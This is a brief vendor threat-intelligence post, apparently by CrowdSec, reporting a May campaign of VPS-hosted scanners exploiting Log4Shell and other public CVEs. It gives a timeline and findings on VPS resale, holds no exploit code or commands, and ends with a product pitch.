Freely subscribe to our NEWSLETTER

Active Scanning Campaigns for Log4j (CVE-2021-44228) in Full Force

4 Years after the exploit was first published, the CrowdSec Network still detects active campaigns targeting the Log4Shell class of exploits.
Article content

About the exploit

The Log4j exploit, a famous remote code execution issue in a popular Apache logging library, ruined Christmas festivities for most security teams in 2021. Nowadays, this exploit is still abused by small-time hacker groups looking to find easy targets to launch more dangerous exploits from.

Key findings

Hackers use simple old exploits, such as the log4j CVE, to capture machines on VPS (virtual private server) providers.
These captured machines are then used for targeted exploitation campaigns against bigger fish, such as enterprise accounts. The hackers can use the captured VPS to hide their origins.
Exploit chains like this one have caused a veritable surge in so-called “Dedic” resellers. Hackers gain access to cheap VPSs and then sell these on-demand to other groups on dark web markets.

The campaign shown in the trend analysis is one of the many such attempts at capturing a batch of VPSs to prepare for reselling.

Trend analysis

20th of May: The CrowdSec network detects a rapid surge in machines targeting CVE-2021-44228, with over 95% of machines originating from DigitalOcean, a VPS provider. The group is assigned a tag, “Magical Peachpuff Scimitarbill” by the CrowdSec monitoring service.
20th - 24th of May: Within 4 days, the campaign targets over 1000 machines connected to the CrowdSec network with a diverse selection of exploits targeting popular open source applications such as CVE-2021-41773 (Apache Server) or CVE-2021-43798 (Grafana).
25th of May: The machines disappear, presumably due to intervention from DigitalOcean.

How to protect your systems

The CrowdSec Network of decentralized agents detected this trend early. If you’re running CrowdSec, you’re likely already protected—CrowdSec Remediation Components actively mitigate these attacks in real-time.

Stay informed: Use Crowdsec CTI to explore IPs used for the campaign.
Stay proactive: Install Crowdsec Web Application Firewall to stay ahead of exploit attempts with 100+ virtual patching rules available.

Sharing insights and taking swift action can collectively reduce the impact of these threats. This is your call to action for real-time threat intelligence and collaborative cybersecurity.